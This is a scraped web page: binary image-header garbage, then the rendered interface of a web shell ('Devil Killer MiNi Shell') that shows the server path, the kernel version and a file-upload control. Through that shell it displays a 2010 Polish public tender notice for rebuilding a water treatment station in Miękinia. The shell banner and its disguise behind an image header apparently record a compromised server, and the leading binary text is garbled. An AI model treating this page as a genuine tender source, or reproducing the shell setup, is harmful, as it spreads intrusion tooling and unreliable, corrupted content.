JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100315/72402-N-2010.html

<p class="kh_header"><b>Miękinia: Przebudowa stacji uzdatniania wody w miejscowości Źródła</b><br>
<b>Numer ogłoszenia: 72402 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych Sp. z o. o , ul. Willowa 16, 55-330 Miękinia, woj. dolnośląskie, tel. 071 3178166, 3178162, faks 071 3178162.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miekinia.zuk.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa stacji uzdatniania wody w miejscowości Źródła.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy istniejącej   Stacji Uzdatniania Wody w miejscowości Źródła która obejmuje :
- wykonanie przebudowy istniejącej stacji uzdatniania wody, zlokalizowanej na działce nr
256/10, uwzględniającej dostosowanie pomp sieciowych, filtrów oraz zbiorników na wodę do
rozbioru wody w ilości 700 m3/d,
- budowę nowego zbiornika wyrównawczego,
- wykonanie zabudowy ujęć
- wykonanie technologii uzdatnia wody głębinowej ujmowanej ze studni głębinowych wraz z
   zainstalowaniem zestawu hydroforowego na potrzeby socjalno - bytowe oraz p.poż.
- wykonanie instalacji technologicznych wody i kanalizacji w obrębie budynku SUW
- wytyczne automatyki procesu uzdatniania wody i sterowania urządzeń w poszczególnych
  fazach procesu,
- wykonanie nadziemnego zbiornika wody czystej, o poj. 300 m3,
- wykonanie sieci zewnętrznych: technologicznych i sanitarnych, wraz z osadnikiem wód   
   popłucznych oraz zbiornikiem ścieków sanitarnych,
- remont budynku SUW oraz zagospodarowanie terenu
- wykonanie instalacji elektroenergetycznej oraz AKPiA
Wykaz prac do realizacji:
1.Roboty budowlane związane z budynkiem SUW:
a) rozbiórki istniejącego kontenera usytuowanego w budynku SUW,
b) wydzielenie pomieszczenia chlorowni oraz pomieszczenia dla obsługi z węzłem sanitarnym, montaż dodatkowych drzwi wejściowych,
c)  fundamentów nowych ciągów filtracji i urządzeń technologicznych,
d) kanału spłuczny,
e) reprofilację posadzki i wykonanie warstwy wierzchniej,
f) remontu ogólny wnętrza budynku obejmujący: malowanie renowacyjne konstrukcji stalowej dachu,malowanie ścian i sufitu,
g) wymianę okien, drzwi i bram,
h) termorenowację dachu i montaż wyrzutni dachowych,
i) montaż daszków nad drzwiami i wrotami,
j) malowanie elewacji.
1.1. Roboty rozbiórkowe:
a) zdemontowanie istniejącego kontenera znajdującego się wewnątrz budynku SUW. 
b) zdemontowanie istniejących okien, drzwi i bramy. 
c) usunięcia warstwy pokrycia dachu.
1.2.Roboty elektryczne 
 Obejmuje tylko instalacje elektroenergetyczne budynku oraz instalację
piorunochronną. 
a)wykonanie  we wszystkich pomieszczeniach instalację natynkową przewodami YDYżo.
b) wykonanie ochrony dodatkowej przed porażeniem przy dotyku pośrednim jest szybkie
wyłączenie zasilania. 
c)wykonanie  zabezpieczenia wyłącznikami różnicowymi obwodów gniazd wtykowych.
1.3. Roboty związane z instalacją wodociągową - wody gospodarczej
a) wykonanie instalację wodociągowej z rur polietylenowych , prowadzonych po wierzchu ścian i stropów, izolowane cieplnie pianką polietylenową .
1.4. Roboty związane z  instalacją - wody ciepłej
Montaż  elektrycznego przepływowego podgrzewacz wody o mocy 3500 W 230V , wyposażony w zawór bezpieczeństwa DN15mm.
1.5. Roboty  kanalizacji sanitarnej
a) odpływ ścieków z odwodnienia hali filtrów zaprojektowano do
układu kanalizacji wód popłucznych gdzie należy wymienić odcinki kanalizacji i wpusty podłogowe wymienić na nowe.
b) całą instalacje powyżej Dn 110 wykonać z rur i kształtek z PVC
w systemie rur kielichowych kanalizacji sanitarnej zewnętrznej w klasie S ,
s/D=0,03 SDR=34, natomiast całą kanalizacje nadziemną oraz podziemną do Dn
110 w systemie wyrobów kanalizacji wewnętrznej
c) piony prowadzone po wierzchu ścian lub w bruzdach ściennych wraz z  odpowietrzeniem.
1.6. Roboty  kanalizacji deszczowej
Odwodnienie dachu budynku przewidziano na teren za
pośrednictwem zewnętrznych pionów deszczowych. Instalację wykonać w systemie
rur PVC .
1.7. Roboty przyłącza kanalizacji sanitarnej
a) wykonanie odwodnienia posadzek pomieszczenia chlorowni do studzienki bezodpływowej z kręgów betonowych, 
b) wykonanie odpływu ścieków z odwodnienia hali filtrów do kanalizacji wód popłucznych .
2.Zewnętrzne instalacje technologiczne obejmują wykonanie :
a)  dwóch żelbetowych zbiorników retencyjnych wody uzdatnionej o pojemności czynnej 2 x 150 m3.
b)  osadnika popłuczyn,
c) zbiornika awaryjnego  na ścieki z chlorowni z przykanalikiem ,
d) rurociągów technologicznych wody uzdatnionej: zasilających zbiorniki i odprowadząjących 
     wodę ze zbiorników do pompowni zlokalizowanej w budynku SUW z uzbrojeniem w niezbędna armaturę,
e) awaryjnych rurociągów przelewowych i spustowych ze zbiorników z kolektorem,
f) rurociągów technologicznych wód popłucznych,
g) przykanalika ścieków sanitarnych,
h) zbiornika szczelnego, bezodpływowego na ścieki sanitarne,
i) dojazdowych dróg technologicznych.
j) likwidację istniejącego  zbiornika stalowego o pojemności 50 m3 oraz związane z
nim rurociągi technologiczne w tym odcinek sieci kanalizacyjnej spustu wody.
2.1. Zbiorniki retencyjne wody uzdatnionej
Dwa zbiorniki wody uzdatnionej o pojemności 150,0 m3 każdy. Pierwszy ze zbiorników został zlokalizowany w miejscu istniejącego, stalowego, zbiornika, który ze względu na stan techniczny został przeznaczony do likwidacji. Drugi ze zbiorników został zaprojektowany obok pierwszego. 
2.2. Osadnik popłuczyn
Zaprojektowano osadnik popłuczyn w postaci szeregowo połączonych trzech typowych zbiorników betonowych ze skosami sedymentacyjnymi o średnicy 2,5 m i wysokości czynnej 3,0 m, z nadstawkami o wysokości 1,25 m wyniesionymi ponad poziomu terenu. Zbiorniki przykryte są pokrywą żelbetowa z włazem. W ostatnim zbiorniku zainstalowanie pompy zatapialnej
do odpompowywania wód nadosadowych
2.3. Osadnik ścieków z chlorowni
Zaprojektowano osadnik na ścieki z chlorowni w postaci zbiornika z tworzywa sztucznego ,
chemicznie odpornego o średnicy Dn1,0 m.
2.4. Rurociągi technologiczne
a)  rurociąg technologiczny wody uzdatnionej zasilające zbiorniki - Dn 110, rury PE, SDR17, PN 10  - długość 65,00 m,
b)  rurociąg technologiczny wody uzdatnionej ze zbiorników na pompownie (budynek SUW)
Dn 110, rury PE, SDR17, PN 10  długość 50,30 m.
c) awaryjne rurociągi przelewowe  ze zbiorników
d) sieć wody spustowej i przelewowej:
-	Dn 110, PE, SDR17, PN 10 długość  18,90 m,
-	Dn 110, PE, SDR17, PN 10 długość 14,50 m,
-	Dn 110, PE, SDR17, PN 10 długość 31,70 m.
e) rurociąg technologiczny wód popłucznych Dn 160 PE, SDR17, PN 10  , długość 3,1 m,
f) rurociąg tłoczny wody nadosadowej Dn 80, PE, SDR17, PN 10 , długość 2,2 m,
g) rurociąg przelewowy wody nadosadowej Dn 160, PE, SDR17, PN 10 , długość 2,2m,
h) przykanalik ścieków sanitarnych Dn 160, PVC , długość 7,7 m,
i)  przykanalik ścieków z chlorowni (awaryjny) Dn 160, PVC, długość  3,1 m.
2.5 Zbiornik scieków sanitarnych
Typowy zbiornik szczelny z tworzywa sztucznego o pojemności 2,0 m3 z przykanalikiem o długości 7,70 m.
2.6 Komory zasuw
a) na trasie rurociągów wody zasilającej i odpływowej ze zbiorników zaprojektowano komorę zasuw w węźle rozdzielczym w postaci betonowej , typowej studni z dnem o średnicy 2,0 m i pokrywą z włazem.
b) druga komora zasuw zlokalizowana pomiędzy zbiornikami, w węźle połączenia rurociągów
przelewowych (awaryjnych) i rurociągów spustowych, w postaci betonowej , typowej studni z dnem, o średnicy 1,5 m i pokrywa z włazem
2.7 Dojazdy technologiczne
Drogi technologiczne przewidziano jako powierzchnie utwardzone, ażurowe. Podbudowa z
kruszywa łamanego  stabilizowanego mechanicznie. Jako wierzchnią warstwę zaprojektowano płyty typu trylinka. Wielkość powierzchni utwardzonych: ok. 370 m2.Długość krawężników drogowych : 186 mb
2.8. Ogrodzenie
Na Stacji Uzdatniania Wody przewiduje się wymianę ogrodzenia z ocynkowanej siatki drucianej ,grubość drutu 3,2 mm. Oczka 5 x 5 cm. Długość: 217 mb wraz z  dwoma bramami o łącznej długości: 8 mb
3. Obudowa studni głębinowej
a) szyb obudowy należy wykonać z gotowego, monolitycznego zbiornika żelbetowego o średnicy 2,0 i wysokości min. 2,0 m npt. z prefabrykowana pokrywa żelbetową posiadającą dwa otwory na włazy:
- właz technologiczny Dn 400 (600), umieszczony centralnie nad głowica
- właz inspekcyjny Dn 600 umieszczony niecentrycznie tak, aby nie utrudniac zejscia do komory.
b) teren wokół studni należy wybrukować tak aby woda opadowa miała swobodny odpływ od studni na zewnątrz. 
4. Opis ogólny projektowanego układu technologicznego
Przewiduje się, iż po modernizacji Stacja Uzdatniania Wody będzie pracowała w następującym
układzie technologicznym:
STUDNIE GŁĘBINOWE - AERATOR CIŚNIENIOWY I-GO STOPNIA - FILTRY ODŻELAZIAJĄCE I-GO STOPNIA - AERATOR CIŚNIENIOWY II-GO STOPNIA - FILTRY ODMANGANIAJĄCE II-GO STOPNIA- ZBIORNIKI RETENCYJNE - ZESTAW HYDROFOROWY - DEZYNFEKCJA - SIEĆ WODOCIĄGOWA
Urządzenia pracować będą w jednym ciągu technologicznym. Zastosowanie proponowanej technologii, opartej na filtracji dwustopniowej z zastosowaniem złoża katalitycznego, umożliwi osiągnięcie parametrów fizyko-chemicznych wymaganych przez aktualne Rozporządzenie Ministra Zdrowia z dnia 29 III 2007 r.
5. Układ napowietrzania
Napowietrzanie wody surowej będzie odbywało się dwuetapowo, przed każdym stopniem uzdatniania. Zapotrzebowanie powietrza do aeracji przyjęto w ilości równej 15% objętości przepływającej wody. Założono minimalny czas kontaktu wody i powietrza wynoszący 3,0 min. 
Przed każdym stopniem filtracji przewidziano zastosowanie kompletnych zestawów napowietrzających (typu WTA 50/A150-100 lub równoważnych) w skład których wchodzi: 1.Ciśnieniowy mieszacz wodno-powietrzny.2.Sprężarka bezolejowa2.Rozdzielnica pneumatyczna3.Orurowanie modułowe4.Armatura niezbędna do regulacji proces
Charakterystyka zestawu : 1.przepływ nominalny wody 36 m3/h,2.przepływ nominalny powietrza 5,4 m3/h ,3.średnica zbiornika 1200 mm .4.przyłącza hydrauliczne 90 mm .
5.1. Pompy i dmuchawy
5.1.1.Dmuchawa powietrza i pompa płucząca
Płukanie przeciwprądowe wodą realizowane będzie przy pomocy pompy płuczącej typu TP 80-250/2, 7,5kW 400 V będzie zamontowanej na wspólnej ramie montażowej zestawu hydroforowego. Pompy będą pobierały wodę ze wspólnego kolektora ssącego DN 150.
5.1.2. Pompownia sieciowa
Woda uzdatniona będzie podawana do sieci za pomocą trzypompowego zestawu hydroforowego Grundfos typu Hydro MPC 3 CR 20-5 lub równoważnym . Przy ciśnieniu tłoczenia ustawionym na 4,5 bara, zestaw będzie pracował z wydajnością ok. 78 m3/h
5.2. Dozowanie podchlorynu sodu
W celu zdezynfekowania wody przewiduje się dozowanie podchlorynu sodu, przy użyciu zestawu dozującego. Dezynfekcja prowadzona będzie tylko podczas rozruchu instalacji, prowadzonych ewentualnie prac modernizacyjnych lub w sytuacjach awaryjnych.
5.2.3. Zbiorniki wody uzdatnionej
Przewiduje się posadowienie na zewnątrz dwóch żelbetowych zbiorników retencyjnych wody uzdatnionej o pojemności czynnej 2 x 150 m3.
6. Ogólny opis systemu sterowania
Przewiduje się, że stacja uzdatniania wody będzie pracowała w trybie pełnej automatyki, gdzie centralny sterownik PLC (typu Ixion f-my Meller lub równoważny) będzie zapewniał pełną kontrolę nad wszystkimi fazami pracySUW. Sterownik będzie zainstalowany w szafie zasilająco-sterowniczej TROX 2200 lub równoważnej. Przewiduje się także zastosowanie współpracującego ze sterownikiem panelu operatorskiego, który będzie umożliwiał komunikację operator - maszyna. Operator korzystając z menu ekranowego, może wybrać obraz stanu urządzeń. Centralny sterownik zostanie także wyposażony w moduł, który będzie umożliwiał zawiadamianie obsługi stacji o występujących awariach, w postaci SMS-ów wysyłanych na wybrane numery telefonów Zamawiającego.
6.1.Przebieg wymaganych - podstawowych - faz pracy SUW i wyposażenie elementów:
6.1.1.Napełnianie zbiornika wody uzdatnionej, a tym samym praca SUW będzie realizowana w funkcji poziomu wody w zbiorniku poprzez zał./wył. pomp głębinowych podających wodę na filtry. W każdym zbiorniku wody uzdatnionej przewiduje się zainstalowanie wiszącej sondy hydrostatycznej oraz sondy poziomu awaryjnego: Max. Aw. sygnalizacja przepełnienia zbiornika
,Max. wyłączenie pomp w studniach, Min. załączenie pomp w studniach, Min.  ppoż. sygnalizacja obniżenia rezerwy ppoż., Min. such. sygnalizacja opróżnienia zbiornika i blokada zestawu hydroforowego
6.1.2.Płukanie filtrów odbywać się będzie w funkcji czasu. Każdy filtr może mieć niezależnie nastawiony czas pracy. Płukanie odbywać się będzie przy pomocy sterownika, w cyklach o zaprogramowanej sekwencji.
6.1.3.Załączenie pompy wód popłucznych, zlokalizowanej w osadniku będzie związana z płukaniem filtrów. Pompa będzie uruchamiana w stałych odstępach czasu po zakończeniu procesu płukania każdego z filtrów. Wyłączenie nastąpi po wypompowaniu wody do określonego poziomu w osadniku, ustawionego za pomocą pływaka.
6.1.4.Napowietrzanie wody surowej będzie realizowane poprzez otwieranie elektrozaworów przy aeratorach  jednocześnie z załączaniem studni.
6.1.5.Załączanie dwóch z trzech studni będzie się odbywać rotacyjnie, tak by każda z pomp głębinowych pracowała jednakową ilość godzin.
6.1.6. Zestaw hydroforowy będzie wyposażony we własny układ sterowania współpracujący ze sterownikiem centralnym.
6.1.7. Praca pomp jest regulowana przez Control MPC z następującymi funkcjami:
- Inteligentny sterownik pomp
- Utrzymanie stałego ciśnienia przez ciągłą regulację prędkości obrotowej pomp CR(I)E.
- Regulator PID z ustawialnymi parametrami PI (Kp+Ti).
- Stałe ciśnienie wartości zadanej niezależnie od ciśnienia wlotowego.
- Praca zał/wył przy małych przepływach.
- Automatyczne kaskadowe sterowanie pomp w celu utrzymania optymalnej sprawności
- Wybór min. czasu pomiędzy zał/wył, automatycznej zamiany i priorytetu pomp.
- Funkcja automatycznego testu pomp niepracujących
- Pompa rezerwowa
- Czujnik rezerwowy
- Praca ręczna
- Zewnętrzny wpływ na wartość zadaną.
6.1.8. Funkcje cyfrowego zdalnego sterowania:
- zał/wył zestawu
- maks., min. lub punkt pracy użytkownika
- do 7 różnych wartości zadanych
Wejścia i wyjścia cyfrowe mogą być konfigurowane indywidualnie
6.1.9. Funkcje kontroli pomp i zestawu
- minimalne i maksymalne granice wartości aktualnych
- ciśnienie wlotowe
- zabezpieczenie silnika
- stała kontrola stanu kabli i przetworników
- alarm log z 24 zapamiętanymi alarmami
6.1.10. Funkcje wyświetlacza i sygnalizacji
- graficzny wyświetlacz 320x240 pikseli z podświetleniem
- zielona dioda sygnalizacji pracy i czerwona dioda sygnalizacji zakłócenia
- bezpotencjałowe styki przełączające pracy i zakłócenia
7. Pozostałe urządzenia, orurowania i armatura
7.1. Rurociągi technologiczne
1. Rurociąg wody surowej ,Dn 100 , natężenie 36m3/h,
2. Rurociąg wody po pierwszym stopniu napowietrzania Dn 100 , natężenie 36m3/h,
3. Rurociąg wody po pierwszym stopniu uzdatniania Dn 100 , natężenie 36m3/h,
4. Rurociąg wody po drugim stopniu napowietrzania Dn 100 , natężenie 36m3/h,
5. Rurociąg wody uzdatnionej Dn 100 , natężenie 36m3/h,
6. Kolektor wody płuczącej Dn 125 , natężenie 90 m3/h,
7.Rurociąg wody uzdatnionej od zbiornika do zestawu hydroforowego Dn 150 , natężenie  87 m3/h
8.Rurociąg wody uzdatnionej od zestawu hydroforowego do wyjścia z budynku na sieć wodociągową  Dn 100 natężenie  87 m3/h
7.2. Odpowietrzniki
W celu odprowadzenia nadmiaru powietrza z instalacji technologicznej przewidziano
wysokosprawne odpowietrzniki zamontowane na rurociągach wody napowietrzonej po każdym stopniu aeracji.
7.3. Przepustnice
Dla zamykania lub otwierania przepływu zastosowano w instalacji technologicznej wysokosprawne przepustnice z napędami ręcznymi i dyskami ze stali nierdzewnej.
7.4. Wodomierze
Do pomiaru natężenia przepływu wody w stacji oraz do sterowania procesem uzdatniania przyjęto wodomierze z nadajnikiem impulsów: - woda uzdatniona podawana do sieci MWN 125 NO , - woda płucząca MWN 125 NO
7.5. Zawór bezpieczeństwa
Dla zabezpieczenia studni głębinowych zostanie przewidziany zawór bezpieczeństwa, jego
parametry zostaną wyspecyfikowane w opracowaniu obejmującym modernizacje studni.
8. Zalecenia dotyczące obsługi pracy stacji
Przewiduje się działanie zaprojektowanej stacji w układzie automatycznym. Wymagana
obsługa stacji polegać ma jedynie na okresowym nadzorze nad pracą elementów SUW, kontroli
szczelności instalacji oraz weryfikacji działania podzespołów wykonawczych automatyki.
Szczegółowe czynności należące do obowiązków personelu obsługującego SUW zostaną opisane
w Instrukcji obsługi SUW, która powinna być wykonana wraz z dokumentacja powykonawczą stacji i przekazana Inwestorowi przed oddaniem stacji do eksploatacji.
Po uruchomieniu urządzeń i wyregulowaniu parametrów pracy osoby wskazane przez Zamawiającego zostaną przeszkolone przez Wykonawcę w zakresie podstawowym, umożliwiającym prawidłową eksploatację SUW.
9. System automatycznej kontroli i sterowania praca SUW
9.1. Zasady sterowania obiektem
Instalacje technologiczne, które są przedmiotem projektu, będą pracowały pod
nadzorem sterownika w pomieszczeniu SUW. Sterownik będzie realizował procedury
automatyczne lub inicjowane przez operatora, z zachowaniem warunków
bezpieczeństwa. Terminal operatorski na elewacji szafy sterowniczej TS, ma umożliwić
operatorowi pełny nadzór nad procesem, inicjowanie operacji technologicznych i w razie
potrzeby, indywidualne sterowanie poszczególnymi elementami wykonawczymi. Układ
dozowania podchlorynu będzie sterowany sygnałem impulsowym zadającym wydajność
i będzie sygnalizował do sterownika zakłócenia w działaniu lub brak czynnika
dozowanego. Poziom wody uzdatnionej w zbiornikach będzie regulowany poprzez
załączanie i wyłączanie kolejno pomp głębinowych, przy czym kolejność pracy pomp
będzie rotacyjna.
9.2. System sterowania i komunikacja z operatorem
System sterowania jest oparty na  sterowniku mikroprocesorowym, o
dużych możliwościach komunikacyjnych i możliwościach rozbudowy ze względu na
modułową konstrukcję. Podstawowym środkiem komunikacji z operatorem ma być
graficzny terminal operatorski o przekątnej ekranu 5,7 cala, zapewniający wizualizację
procesu, prezentację komunikatów alarmowych i możliwość wprowadzania poleceń
operatora zarówno na poziomie procesów technologicznych jak i sterowania
pojedynczymi urządzeniami. Terminal ma być zamontowany w szafie sterowniczej TS, w
pomieszczeniu  SUW.
9.3. Aparatura obiektowa
Pomiary parametrów procesu będą realizowane za pomocą nowoczesnych
przetworników elektronicznych, produkcji znanych i doświadczonych firm.
Aparaty te musza być wykonane z materiałów odpornych na czynniki agresywne ( np.stal 316L,
tworzywa sztuczne), a ich obudowy będą miały stopień ochrony odpowiedni do
warunków lokalizacji danego aparatu. Informacje do systemu sterowania z
przetworników i czujników  ,mają być przekazywane  sygnałem standardowym 4 - 20 mA ,
względnie w postaci dwustanowych sygnałów 24V DC .
9.4. Sterowanie zaworami.
Podstawowymi elementami wykonawczymi sterowania procesem są przepustnice z
siłownikami pneumatycznymi. Przepustnice pneumatyczne maja być  wyposażone w
siłowniki dwustronnego działania z wyłącznikami krańcowymi do sygnalizacji położenia.
Sterowanie zaworami z systemu sterowanie będzie realizowane za pomocą
elektromagnetycznych zaworów pilotowych. Będą to zawory pilotowe jedno-cewkowe ze
sprężynowym powrotem zgrupowane w dwóch wyspach zaworowych.
9.5 Sterowanie napędami elektrycznymi
Napędy elektryczne (silniki pomp, dmuchawa) sterowane są sygnałami
doprowadzonymi z modułów wejść/wyjść systemu do układów stycznikowych w
rozdzielni elektrycznej, poprzez przekaźniki interfejsowe w szafie TSj. Dla
poszczególnych silników doprowadzone będą sygnały dwustanowe -start/stop. Jako
sygnały zwrotne do systemu będą wyprowadzone z rozdzielni sygnały -praca , i
gotowość elektryczna.
10. Instalacje AKPiA
Instalacje AKPiA należy wykonać kablami i przewodami w izolacji PCV, a dla obwodów
analogowych przewodami i kablami ekranowanymi. Przewody i kable maja być poprowadzone 
w korytkach instalacyjnych, a na dojściach od korytek do aparatów ochronione rurkami
ochronnymi.
11. Zasilanie elektryczne
W ramach branży elektrycznej doprowadzone będzie zasilanie 230V AC do szafy TS w
pomieszczeniu SUW, obok rozdzielni, z odpowiednimi zabezpieczeniami.
12. Charakter terenu przewidzianego pod inwestycje
Zamawiający informuje , że  działka nr 256/10 jest wpisana do rejestru zabytków.
Na projektowana inwestycje uzyskano pozytywna opinie wojewódzkiego konserwatora zabytków
we Wrocławiu.
13. Wymagania ogólne i zalecenia końcowe
a)materiały i urządzenia użyte do realizacji projektu powinny posiadać wszelkie niezbędne aprobaty i dopuszczenia, wynikające z aktualnych przepisów prawa, w szczególności atest PZH na elementy mające kontakt z wodą pitną.
b) w przypadku wystąpienia warunków innych niż przyjęte założenia projektowe, wszelkie niezbędne zmiany należy konsultować z projektantem.
c) w dokumentacji dla potrzeb obliczeniowych podano typy i producentów urządzeń. Dopuszcza się zastosowanie rozwiązań równoważnych z zastosowaniem zamienników o parametrach
technicznych i jakościowych nieodbiegąjących od przyjętych w projekcie.
d)projektowane rurociągi i armatura zostały wyspecyfikowane z podaniem konkretnego producenta lub dostawcy w celu dokładnego określenia parametrów technicznych i jakościowych. Dopuszcza się zastosowanie materiałów innych niż wskazane w projekcie, pod warunkiem jednak, że będą one spełniać określone wymagania techniczne.
e) Wykonawca zobowiązany jest do dostarczenia kart katalogowych wszystkich urządzeń zamontowanych w SUW
f) po zakończeniu prac ,należy wykonać analizę wody surowej i uzdatnionej,
g) po zakończeniu robót , należy wykonać geodezyjny operat powykonawczy i uzyskać decyzje pozwolenia na użytkowanie obiektu. 

Z uwagi na złożoność oraz szeroki zakres prac o znacznym stopniu trudności Wykonawca powinien dokonać wizji lokalnej przyszłego terenu budowy oraz do zapoznać się z jego otoczeniem, a także do oszacowania na własną odpowiedzialność, kosztu i ryzyka wszelkich danych, jakie mogą okazać się niezbędne do przygotowania oferty i podpisania umowy. Wizja lokalna przeprowadzana jest na koszt własny Wykonawcy. Zamawiający nie będzie brał pod uwagę żadnych roszczeń Wykonawcy będących skutkiem zaniechania oględzin terenu budowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. Zamówienia uzupełniające będą mogły zostać udzielone, jeżeli: 1) polegają na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe, 2) zamówienia uzupełniające są zgodne z przedmiotem zamówienia podstawowego, 3) wartość zamówień uzupełniających nie przekroczy 20 % wartości zamówienia podstawowego, 4) zostaną udzielone w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
